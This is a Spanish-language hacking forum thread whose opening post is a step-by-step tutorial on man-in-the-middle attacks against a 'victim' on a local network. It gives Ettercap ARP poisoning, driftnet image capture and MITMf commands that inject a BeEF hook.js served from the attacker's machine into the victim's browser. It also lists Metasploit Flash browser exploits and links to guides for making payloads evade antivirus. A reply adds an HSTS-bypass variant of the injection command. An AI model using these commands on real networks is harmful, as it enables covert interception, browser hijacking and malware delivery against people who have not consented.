Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: BrowserNet en Mayo 23, 2016, 05:41:28 PM

Título: MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit
Publicado por: BrowserNet en Mayo 23, 2016, 05:41:28 PM
(http://4.bp.blogspot.com/-WGWpPRTAeQk/Vijgd-H83iI/AAAAAAAACWc/y2z8OP2GZDA/s1600/1.jpg)

Main in the middle o hombre en el medio es un ataque en la cual nosotros estaremos en el medio entre los ordenadores y el rooter capturando el trafico de datos con una metodología que pasare a explicar sin tecnicismo en una imagen:

(http://3.bp.blogspot.com/-JeEP28_c-WM/VijmZb8xp_I/AAAAAAAACWs/BjbkGcwWYe0/s1600/2.gif)

cuando una ordenador hace una petición a un servicio su procedimiento normal es que esta tiene que pasar al rooter y posteriormente al internet, en nuestro caso si la victima hace una petición a un servicio nosotros vamos a recibir los datos en texto plano recolectando datos de información en primer plano, el segundo envió seria al  rooter y luego al internet, en esta oportunidad voy a utilizar Ettercap la cual es una herramienta en código abierto que nos permitirá ejecutar el ataque.

Primer escenario Ettercap

En mi caso ejecutare la plataforma GUI, lo que haremos sera dirigimos a la primera pestaña que les aparecerá primero en el Ettercap daremos en "Sniff", luego de ello escogeremos nuestra interface de red, en mi caso es Eth0, automáticamente pasara a iniciar el servidor de snnifeo, luego nos dirigimos a la opción que parece en la imagen  entraremos a "Hosts" y luego procederá a hacer un análisis de rangos para ver las IP'S o ordenadores conectados ahora mismo, de igual manera escuchara a las entrantes conexiones entrantes en cualquier momento. 

(http://3.bp.blogspot.com/-t3YfMuXOCQ8/VijtH8cdovI/AAAAAAAACW8/9KIyB45v9gI/s1600/1.png)

Listado de red lo puedo ver en "Hosts" >> Hosts List

(http://4.bp.blogspot.com/-Ja4WYtcywD4/Vijut4_9QsI/AAAAAAAACXI/fTQSU4VzeeU/s1600/2.png)

la IP de mi sistema de red es 192.168.179.129 , la de mi victima sera la primera que es 192.168.179.2  una ves identificado a quien haré el ataque procederemos a lanzar el ataque de la siguiente manera.

(http://1.bp.blogspot.com/-rEgGNP2uQ0w/Vijyj-p4AsI/AAAAAAAACXU/99sxwWayYnY/s1600/3.png)

Luego de ello le daremos en aceptar, ya que estamos estableciendo una conexión entra nuestro sistema con la de la victima, luego de ello iremos a la opción "Mitm" y daremos en "ARP":

(http://3.bp.blogspot.com/-etClqkk-w1E/VijzYUxbQnI/AAAAAAAACXg/v8u9s5BK714/s1600/5.png)

ahora daremos en primera opción "para establecer el sniffeo remoto.

(http://2.bp.blogspot.com/-18b8GBJp__c/VijzYUFjk9I/AAAAAAAACXc/GTi98hcqQd0/s1600/4.png)

al aceptar completamente ya tendríamos el envenenamiento ARP establecido, entonces lo que haré en mi caso sera utilizar driftnet, que es un capturador de imágenes remotas  de sistemas comprometidos en tiempo real, solamente añadimos nuestra interface en mi caso fue #Eth0

root@kali:~# driftnet -i eth0

(http://2.bp.blogspot.com/-dxX27n-x2WU/Vij1Lwf8-DI/AAAAAAAACXw/Lalmmo53OV0/s1600/1.png)

Una ves establecido nuestro capturar, al momento que la victima entre a un servidor podemos capturar el trafico de imágenes,  un ejemplo mi victima esta en la siguiente web:

(http://3.bp.blogspot.com/-MCOYwTe7FnY/Vij19UQlvlI/AAAAAAAACX4/dgIZ-WHoge0/s1600/2.png)

Nuestra victima ni siquiera sospechara nada, ya que hemos infectado la red por ende la explotación se basa en las conexiones de entrada y escucha, entonces pasamos a nuestro ordenador y vemos las imágenes capturadas:

(http://1.bp.blogspot.com/-19W5TnrWGHQ/Vij2q7S37EI/AAAAAAAACYA/9vaqHMl8ch0/s1600/3.png)

Si desean capturar el trafico de datos en texto plano, les dejare un articulo en donde enseño el método:

http://backtrack-omar.blogspot.pe/2015/10/capturando-e-interceptando-datos-de-red.html
Segundo escenario MITMF

Segundo escenario MITMF

MITMf tiene como objetivo proporcionar una ventanilla única para los ataques Man in the Middle y la red durante la actualización y la mejora de los ataques y técnicas existentes.

Originalmente construido para hacer frente a las deficiencias significativas de otras herramientas por ejemplo Ettercap, Mallory, ha sido re-escrito casi completamente desde cero para proporcionar un framework modular y fácilmente extensible que cualquiera puede utilizar para implementar su propio ataque MITM.

descarga:
https://github.com/byt3bl33d3r/MITMf/

Lo primero que haremos sera actualizar algunos repertorios que necesitara para ejecutar sus capacidades utilitarias.

root@kali:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev


(http://4.bp.blogspot.com/-TSTufWl6OIw/Vij8AKeEOSI/AAAAAAAACYg/R_TW7llGzp4/s1600/Captura%2Bde%2Bpantalla%2Bde%2B2015-10-20%2B18%255E%252552%255E%252552.png)

Lo que haremos sera descargar el MITMF y proceder a instalar sus requerimientos para que pueda funcionar correctamente:

root@kali:~# git clone https://github.com/byt3bl33d3r/MITMf
root@kali:~# cd MITMf && git submodule init && git submodule update --recursive
root@kali:~# pip install -r requirements.txt


(http://1.bp.blogspot.com/-ZiubA9Tv0pI/Vij5ryijcGI/AAAAAAAACYU/4FJzy28XGgE/s1600/Captura%2Bde%2Bpantalla%2Bde%2B2015-10-20%2B18%255E%252550%255E%252515.png)

Una ves completado todo eso, ya tendremos nuestra herramienta lista para ser usada pero antes que nada necesitaremos enfocarnos en una victima la cual sera la misma 192.168.179.2, pero antes de ello utilizaremos "BeEF" para crear nuestro servidor de infección y activarlo.
Para configuar BeFF y añadir los módulos de metasploit puede ver el siguiente articulo:

http://backtrack-omar.blogspot.pe/2015/10/beef-browser-exploitation-framework.html

(http://3.bp.blogspot.com/-Vp5SwKh6Hho/Vij89xWD2-I/AAAAAAAACYs/julK8OmV7gU/s1600/Captura%2Bde%2Bpantalla%2Bde%2B2015-10-20%2B19%255E%252517%255E%252538.png)

En este caso lo que haremos sera utilizar el script hook.js, ya que podemos inyectar este código malicioso en los navegadores en los servidores web que la victima entre sin que se de cuenta, para ello utilizaremos BeEF para enviarlo remotamente con el envenenamiento ARP

root@kali:~# python mitmf.py --spoof --arp -i eth0 --gateway 192.168.179.2 --target 192.168.179.132 --inject --js-url http://192.168.179.129:3000/hook.js

-i identificamos el tipo interface en mi caso "eth0", --gateway es el servicio rooter y por ende --target la ip de la victima.

(http://2.bp.blogspot.com/-iKQvn3Yhz8o/Vij-Wa-ec9I/AAAAAAAACZA/AiiUSZ1_gHA/s1600/Captura%2Bde%2Bpantalla%2Bde%2B2015-10-20%2B19%255E%252501%255E%252516.png)

entonces ya tenemos listo nuestra conexión main in the middle para infectarlo directamente al momento que la victima entre a cualquier pagina web, en mi caso mi victima entro a una pagina de adultos "Nuevamente" jajaja.

(http://1.bp.blogspot.com/-VyEdOMlN3TA/Vij_znV_RDI/AAAAAAAACZM/C7BfvGte3yo/s1600/vm.png)

al momento que la victima entre nosotros en primer plano tendremos los datos DNS:

(http://4.bp.blogspot.com/-_7jSxfeWojQ/VikAMvFO1pI/AAAAAAAACZU/oyLfqyrL2gM/s1600/Captura%2Bde%2Bpantalla%2Bde%2B2015-10-20%2B18%255E%252558%255E%252515.png)

Como vemos vemos los datos de la victima, la cual utiliza windows 7 conectado al navegador Firefox y vemos la URL donde se inyecto el código, otro plano abriremos el panel de BeFF y tendremos su sesión captura, con la cual podemos explotar a nuestra victima.

(http://4.bp.blogspot.com/-9pctYe2sYXM/VikAwt8-KSI/AAAAAAAACZg/dhyJfPWm8Rs/s1600/Captura%2Bde%2Bpantalla%2Bde%2B2015-10-20%2B18%255E%252558%255E%252503.png)

Aqui unos metodos de explotacion:

http://backtrack-omar.blogspot.pe/2015/10/beef-browser-exploitation-framework.html


Atacando con metasploit:

(http://1.bp.blogspot.com/-EqSXVMe9z20/VfROnFkQeII/AAAAAAAABeA/a-EH30Pt8VI/s1600/flash-Player-zero-day-vulnerability.jpg)

En metasploit seria aprovechar el MITMF mediante el exploit de java hace poco tiempo nuevamente hay nuevos exploit para explotar nuevos complementos:

Módulos nuevos:

(http://4.bp.blogspot.com/-3wvhQiz2iX0/VikMbJ7r0kI/AAAAAAAACZw/HA-n2XM6bqA/s1600/1.png)


auxiliary/server/browser_autopwn2
exploit/multi/browser/adobe_flash_hacking_team_uaf
exploit/multi/browser/adobe_flash_nellymoser_bof
exploit/multi/browser/adobe_flash_net_connection_confusion
exploit/multi/browser/adobe_flash_opaque_background_uaf
exploit/multi/browser/adobe_flash_shader_drawing_fill
exploit/multi/browser/adobe_flash_shader_job_overflow

http://backtrack-omar.blogspot.pe/2015/09/2015-flash-0day-exploit-hackingteam.html

root@kali:~# python mitmf.py --spoof --arp -i eth0 --gateway 192.168.179.2 --target 192.168.179.132 --inject --js-url (añadiran el payload del exploit que les carge en metasploit)


(http://4.bp.blogspot.com/-XP8gpAA3JcE/VfRlCDnzGLI/AAAAAAAABes/CwC_1lxfJZU/s1600/Screenshot_1.png)

de igual manera puedes añadir : payloads ejecutables para que lo descarge y ejecute para explotar al sistema, siempre y claro deben dejarlo FUD, aqui el post para hacer tu payload indetectable:

http://backtrack-omar.blogspot.pe/2015/10/evadiendo-av-codificando-payloads-con.html

Diferentes técnicas para crear tus payload:

http://backtrack-omar.blogspot.pe/2015/10/unicorn-la-herramienta-de-infeccion.html
http://backtrack-omar.blogspot.pe/2015/10/winrar-nuestro-viejo-aliado-de.html
http://backtrack-omar.blogspot.pe/2015/10/pupy-remote-administration-tool.html
Título: Re:MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit
Publicado por: Random en Mayo 23, 2016, 07:33:17 PM
Muy buen post ! La primer parte la conocía, la segunda no tanto, pero muy lindo aporte, se agradece !

Saludos !
Título: Re:MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit
Publicado por: Mr.BOTNNES en Marzo 13, 2017, 03:28:04 PM
Una consulta, en las paginas con https también sirve?
Título: Re:MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit
Publicado por: Stiuvert en Marzo 13, 2017, 04:37:58 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Una consulta, en las paginas con https también sirve?

Lo tienes muy complicado, pero investiga sobre SSL Strip.
Título: Re:MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit
Publicado por: Stuxnet en Marzo 14, 2017, 12:53:52 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Una consulta, en las paginas con https también sirve?

Intenta agregando --hsts

Código (text) [Seleccionar]
mitmf --hsts --spoof --arp -i INTERFACE --gateway 192.168.1.1 --inject --js-url http://192.168.1.100:3000/hook.js

Aparte te aconsejo tener la version de Twisted 15.5.0

Código (text) [Seleccionar]
pip install Twisted==15.5.0
Título: Re:MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit
Publicado por: HckH3x en Marzo 14, 2017, 02:17:42 PM
Buenísimo aporte, se nota tu esfuerzo.
Sigue así, ayudas bastante en el aprendizaje.
Título: Re:MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit
Publicado por: zoro248 en Marzo 22, 2017, 09:32:46 PM
Buen post, se deberian actualizar los links
Título: Re:MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit
Publicado por: kackerweno en Abril 04, 2017, 09:56:51 PM
el ssl strip funciona todavia con cain???????????
Título: Re:MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit
Publicado por: puntoCL en Abril 05, 2017, 01:37:02 AM
@kackerweno (https://underc0de.org/foro/index.php?action=profile;u=63593)

Si es cain de oxid. es un no